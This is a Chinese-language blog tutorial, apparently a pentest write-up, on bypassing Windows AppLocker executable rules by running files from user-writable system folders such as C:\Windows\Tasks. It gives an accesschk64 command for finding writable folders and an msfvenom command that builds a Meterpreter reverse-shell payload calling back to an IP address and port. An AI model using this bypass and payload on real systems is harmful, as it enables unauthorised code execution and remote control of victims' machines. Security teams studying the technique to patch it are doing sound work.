• 使用弱路径规则绕过应用程序白名单


    当您是渗透测试团队的一员时,发现漏洞非常重要。由于此类漏洞是黑客入侵的根源,因此攻击者会积极寻找它们。因此,为了修补此类漏洞,您必须知道如何以及在何处找到它们。此类漏洞之一就是Windows中的弱文件夹。

    为了保护窗户,Microsoft提供了多种安全策略。其中一种策略不允许执行exe文件,这意味着可以由攻击者发送的恶意exe文件将无法在目标PC上运行。要应用此类策略,您需要进入Windows> Applocker>可执行规则>的本地安全策略,然后应用该策略。您可以在下面的图像中看到,已设置了默认规则。

    现在,如果您尝试运行任何给定的.exe文件,它将不会运行。在这里,我尝试执行putty.exe文件,但是如您在下图中所看到的,它没有运行。

    此策略的漏洞在于,尽管有这样的安全策略,但仍然只有很少的文件夹具有写和读权限,并且此类文件将从这些文件夹中执行。如果我在C驱动器> Windows>任务文件夹中运行相同的exe,即putty.exe,则它将如下图所示执行。

    要检查哪些文件夹具有读写权限,可以使用以下命令:

    1

    accesschk64.exe "Users" c:/Windows -w

    使用此命令,您可以在下图中看到,除了临时文件夹,任务文件夹和跟踪文件夹之外,其他所有访问都被拒绝。

    现在让我们尝试使用msfvenom通过以下命令针对目标PC创建的恶意软件:

    1

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

    当您在受害者的PC中执行上述恶意软件时,由于适用的安全策略,该恶意软件将无法运行。

    但是,如果使用漏洞,则可以从task文件夹执行文件,如下图所示:

    然后,您将根据需要进行会话。

    因此,在提供安全性或攻击时,您必须了解目标计算机的所有知识,以便您可以针对它们使用它们的安全性,或者通过修补此类漏洞来提供更好的安全性。

  • 相关阅读:
    ACR Code Pacs
    如何利用IIS调试ASP.NET网站程序详解
    Server 2003 操作系统位数
    App.config/Web.config 中特殊字符的处理
    IE 对象不支持“attachEvent”属性或方法
    Invoke和BeginInvoke理解
    升级mongodb数据库2.6.6到3.0.3,切换引擎,主从同步数据
    mac android sdk manager 无法更新(被墙)
    hadoop-mongo map/reduce java
    mongodb use where and custom function to query mongodb存储过程
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13745089.html
Copyright © 2020-2023  润新知